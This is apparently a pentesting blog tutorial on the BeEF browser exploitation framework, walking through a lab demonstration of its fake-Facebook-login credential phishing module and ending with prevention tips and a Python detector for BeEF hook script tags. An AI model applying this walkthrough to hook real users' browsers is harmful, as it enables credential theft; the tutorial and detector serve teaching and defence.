BeEF for Pentesters

BeEF

The word beef has quite a different meaning for pentesters than for regular people. For regular people it's a delicacy, but for most pentesters it's one of the most common tools used in a pentesting environment. So what is this BeEF?

BeEF stands for Browser Exploitation Framework. As the name suggests, it is a tool that works by hooking into the victim's browser. This dangerous but cool tool comes pre-installed with Kali Linux. It's mostly used to test client-side attacks through the web browser. So let us see what BeEF is about.

As I am mostly going to talk about the tool, I won't discuss how to hook a browser with it. There are innumerable methods you can use to hook your victim's browser, such as a man-in-the-middle attack or phishing, but that discussion is perhaps for another day. So I am assuming you have already hooked your victim. Once the hook URL has been injected into the victim's browser (the hook URL points to JavaScript code which, once injected into a page, makes the victim's browser connect back to you), this is what is presented to you after logging into the BeEF service.

Once someone is hooked, their browser appears under Online Browsers.

So basically, if you navigate to that URL in your Kali machine, you will have to log in to BeEF, and after logging in successfully this GUI is presented to you. As I said, I have already hooked a browser, which is listed under online browsers since the user is currently using it. We can see the IP of the machine is 10.0.2.4. You can also see that it's a Windows machine and a virtual machine (this was done in my pentesting lab, hence a virtual machine). Once the user goes offline, i.e. closes the browser, it will move under offline browsers, which acts like a history of previously hooked browsers.

Now when we hook a browser, the first thing to do is always to look at the information gathered. Once we click the browser's IP, we are presented with this. Apologies that in this picture my victim is listed as offline; that is because I took this screenshot after my victim went offline.

We can display all the info about the browser we hooked.

As you can see, we can view quite a few details about the browser we hooked. We can display more information by scrolling up and down.

Now let us move to the commands to perform some attacks. Fire up the Commands section; many categories will be displayed. For this article I have demonstrated a social engineering attack. Under Commands there is a section called Social Engineering. Click it and you should see this.

Options when performing a simple phishing attack with BeEF.

I selected the Pretty Theft option and the tool showed me a description of the attack. As you can see, the attack is self-explanatory: a Facebook-style alert dialog box appears telling the user that he/she has been logged out of Facebook and must log in again with their credentials, and then we capture the data. Let us see what happens when we execute it:

A fake Facebook login popup is displayed on executing the command.

As you can see, we delivered exactly as promised. The perfect victim would obviously be a person who was browsing Facebook and had moved to another tab. But remember this is a social engineering attack, which means it depends a lot on the situation and the set-up. So the victim enters his credentials and presses Login. Let us see what BeEF captured for us.

Login credentials were captured by BeEF.

And voilà! Those were the exact credentials I entered: username arnav and password arnav. You can see them in the Data section. And that is how easy it is to perform a client-side attack using BeEF.

Now a few things should be kept in mind. First, although I performed this attack from a local network, with port forwarding this attack can also be performed from outside a local network. Think about it: anyone can use BeEF and hook your browser from anywhere in the world!

Now for prevention, the obvious thing to do is to never browse plain HTTP pages or open suspicious URLs. Also, an add-on known as HTTPS Everywhere is available, which prevents an attacker from performing an sslstrip attack, so that your connection to the web server isn't downgraded from HTTPS to plain HTTP.
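
On the detection side, the injected hook described earlier shows up in page HTML as a script tag loading from an origin the site never uses. The following added example (my code, not part of the original post or of BeEF) scans captured HTML for third-party script sources and flags any that match BeEF's default hook path (/hook.js) or default port (3000); both are configurable by the operator, so the allowlist check is the part that generalises. The host 203.0.113.10 and the page are constructed sample data.

```python
"""Flag externally loaded scripts in captured HTML that look like a BeEF hook.

Defensive example with constructed data. BeEF serves its hook as /hook.js on
port 3000 by default; both are configurable, so unlisted origins are flagged
even when no default indicator matches.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: one legitimate script, one injected hook (made-up host).
SAMPLE_HTML = """<html><head>
<script src="https://www.example-shop.test/static/app.js"></script>
<script src="http://203.0.113.10:3000/hook.js"></script>
</head><body>hello</body></html>"""

# Origins this site legitimately loads scripts from (constructed allowlist).
ALLOWED_HOSTS = {"www.example-shop.test"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in the document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def looks_like_beef_hook(url):
    """True if the URL uses BeEF's default hook path or default port."""
    parts = urlsplit(url)
    return parts.path.endswith("/hook.js") or parts.port == 3000


def find_suspicious_scripts(html, allowed_hosts):
    """Return (url, reason) for each script not served from an allowed host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        host = urlsplit(src).hostname
        if host is None or host in allowed_hosts:
            continue  # relative path or first-party script: nothing to flag
        reason = "beef-hook-indicator" if looks_like_beef_hook(src) else "unlisted-origin"
        findings.append((src, reason))
    return findings


if __name__ == "__main__":
    for url, reason in find_suspicious_scripts(SAMPLE_HTML, ALLOWED_HOSTS):
        print(f"{reason}: {url}")
```

The same function can be run over pages saved from a proxy capture; an unlisted origin that also serves the page's other scripts is a likely false positive, while a lone script from an IP-address origin deserves a closer look.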
So this was about BeEF. And as a reminder, please do not use it without written permission from the user you are testing. Be ethical :)

Cats, pizza and cyber security are all I live for! Follow me for a wide variety of topics in the field of cyber security. OSCP, CRTE, CRTP, CKAD holder.